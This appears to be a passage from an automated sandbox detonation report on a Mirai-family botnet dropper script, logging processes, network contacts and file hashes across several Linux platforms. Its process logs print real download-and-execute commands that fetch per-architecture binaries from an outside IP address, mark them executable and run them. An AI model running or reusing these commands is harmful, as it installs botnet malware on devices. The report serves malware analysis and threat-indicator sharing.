[curl -O http://198.12.107.126/bins/camp.m68k]

/bin/cat

[cat camp.m68k]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sh4]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sh4]

/bin/cat

[cat camp.sh4]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

Network

Country Destination Domain Proto
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp

Files

/tmp/busybox

/tmp/camp.arc

/tmp/Chaotic

/tmp/Chaotic

/tmp/Chaotic

/tmp/Chaotic

memory/816-1-0x00400000-0x0045af60-memory.dmp

/tmp/Chaotic

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 08:32

Reported

2024-11-09 08:34

Platform

debian9-mipsel-20240418-en

Max time kernel

138s

Max time network

145s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Chaotic /tmp/Chaotic N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/Chaotic N/A
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/Chaotic N/A
File opened for modification /bin/watchdog /tmp/Chaotic N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/camp.mips /usr/bin/wget N/A
File opened for modification /tmp/camp.arm5 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm5 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm6 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips64 /usr/bin/curl N/A
File opened for modification /tmp/camp.ppc /usr/bin/curl N/A
File opened for modification /tmp/busybox /bin/cp N/A
File opened for modification /tmp/camp.m68k /usr/bin/curl N/A
File opened for modification /tmp/camp.sh4 /usr/bin/curl N/A
File opened for modification /tmp/camp.arc /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/wget N/A
File opened for modification /tmp/camp.arm /usr/bin/curl N/A
File opened for modification /tmp/camp.x86 /usr/bin/wget N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/curl N/A
File opened for modification /tmp/camp.arc /usr/bin/wget N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/camp.ppc /usr/bin/wget N/A
File opened for modification /tmp/camp.sparc /usr/bin/curl N/A
File opened for modification /tmp/camp.x86 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/wget N/A
File opened for modification /tmp/camp.arm6 /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/wget N/A
File opened for modification /tmp/camp.sh4 /usr/bin/wget N/A
File opened for modification /tmp/Chaotic /tmp/ohshit.sh N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arc]

/bin/cat

[cat camp.arc]

/bin/chmod

[chmod +x busybox camp.arc Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86]

/bin/cat

[cat camp.x86]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86_64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86_64]

/bin/cat

[cat camp.x86_64]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.i686]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.i686]

/bin/cat

[cat camp.i686]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips]

/bin/cat

[cat camp.mips]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips64]

/bin/cat

[cat camp.mips64]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mpsl]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mpsl]

/bin/cat

[cat camp.mpsl]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-xf2Y29]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm]

/bin/cat

[cat camp.arm]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm5]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm5]

/bin/cat

[cat camp.arm5]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm6]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm6]

/bin/cat

[cat camp.arm6]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm7]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm7]

/bin/cat

[cat camp.arm7]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.ppc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.ppc]

/bin/cat

[cat camp.ppc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sparc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sparc]

/bin/cat

[cat camp.sparc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.m68k]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.m68k]

/bin/cat

[cat camp.m68k]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sh4]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sh4]

/bin/cat

[cat camp.sh4]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic ohshit.sh]

/tmp/Chaotic

[./Chaotic]

Network

Country Destination Domain Proto
US 198.12.107.126:80 198.12.107.126 tcp
US 198.12.107.126:3778 tcp

Files

/tmp/busybox

/tmp/camp.arc

/tmp/Chaotic

/tmp/Chaotic

/tmp/Chaotic

/tmp/Chaotic

/tmp/Chaotic

memory/842-1-0x00400000-0x0045af60-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 08:32

Reported

2024-11-09 08:34

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

139s

Max time network

150s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Chaotic /tmp/Chaotic N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/Chaotic N/A
File opened for modification /dev/watchdog /tmp/Chaotic N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/watchdog /tmp/Chaotic N/A
File opened for modification /sbin/watchdog /tmp/Chaotic N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/camp.ppc /usr/bin/wget N/A
File opened for modification /tmp/camp.i686 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm /usr/bin/wget N/A
File opened for modification /tmp/camp.arm5 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm7 /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/wget N/A
File opened for modification /tmp/camp.x86 /usr/bin/curl N/A
File opened for modification /tmp/camp.mips /usr/bin/wget N/A
File opened for modification /tmp/camp.mips /usr/bin/curl N/A
File opened for modification /tmp/camp.mips64 /usr/bin/curl N/A
File opened for modification /tmp/camp.mpsl /usr/bin/curl N/A
File opened for modification /tmp/busybox /bin/cp N/A
File opened for modification /tmp/camp.arc /usr/bin/wget N/A
File opened for modification /tmp/Chaotic /tmp/ohshit.sh N/A
File opened for modification /tmp/camp.mpsl /usr/bin/wget N/A
File opened for modification /tmp/camp.ppc /usr/bin/curl N/A
File opened for modification /tmp/camp.sh4 /usr/bin/wget N/A
File opened for modification /tmp/camp.x86 /usr/bin/wget N/A
File opened for modification /tmp/camp.arm6 /usr/bin/wget N/A
File opened for modification /tmp/camp.sparc /usr/bin/curl N/A
File opened for modification /tmp/camp.m68k /usr/bin/curl N/A
File opened for modification /tmp/camp.sh4 /usr/bin/curl N/A
File opened for modification /tmp/camp.arc /usr/bin/curl N/A
File opened for modification /tmp/camp.arm /usr/bin/curl N/A
File opened for modification /tmp/camp.arm6 /usr/bin/curl N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/camp.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/camp.i686 /usr/bin/curl N/A
File opened for modification /tmp/camp.arm5 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arc]

/bin/cat

[cat camp.arc]

/bin/chmod

[chmod +x busybox camp.arc Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86]

/bin/cat

[cat camp.x86]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.x86_64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.x86_64]

/bin/chmod

[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.i686]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.i686]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mips64]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mips64]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.mpsl]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.mpsl]

/bin/chmod

[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm5]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm5]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm6]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm6]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.arm7]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.arm7]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.ppc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.ppc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sparc]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sparc]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.m68k]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.m68k]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

/usr/bin/wget

[wget http://198.12.107.126/bins/camp.sh4]

/usr/bin/curl

[curl -O http://198.12.107.126/bins/camp.sh4]

/bin/chmod

[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]

/tmp/Chaotic

[./Chaotic]

Network

Country Destination Domain Proto
US 198.12.107.126:80 198.12.107.126 tcp
N/A 224.0.0.251:5353 N/A udp
GB 185.125.188.61:443 N/A tcp
US 151.101.1.91:443 N/A tcp
GB 195.181.164.17:443 N/A tcp
US 198.12.107.126:3778 N/A tcp

Files

/tmp/busybox

MD5 b4dede5fc0b1bad5cb8e901bde126b97
SHA1 10cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256 a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA512 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

/tmp/camp.arc

MD5 36a7a1e959eaf7d6896505777912ecdf
SHA1 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919
SHA256 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca
SHA512 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0

/tmp/Chaotic

MD5 dac9f1dcafdb77db0d0ff1be1e704b1e
SHA1 e83605a050e0aaad3dba360545a00036f083eb91
SHA256 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d
SHA512 e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571

memory/1507-1-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1517-2-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1527-3-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1537-4-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1547-5-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1559-6-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1569-7-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1579-8-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1589-9-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1599-10-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1609-11-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1619-12-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1629-13-0x0000000008048000-0x000000000805bc40-memory.dmp

memory/1639-14-0x0000000008048000-0x000000000805bc40-memory.dmp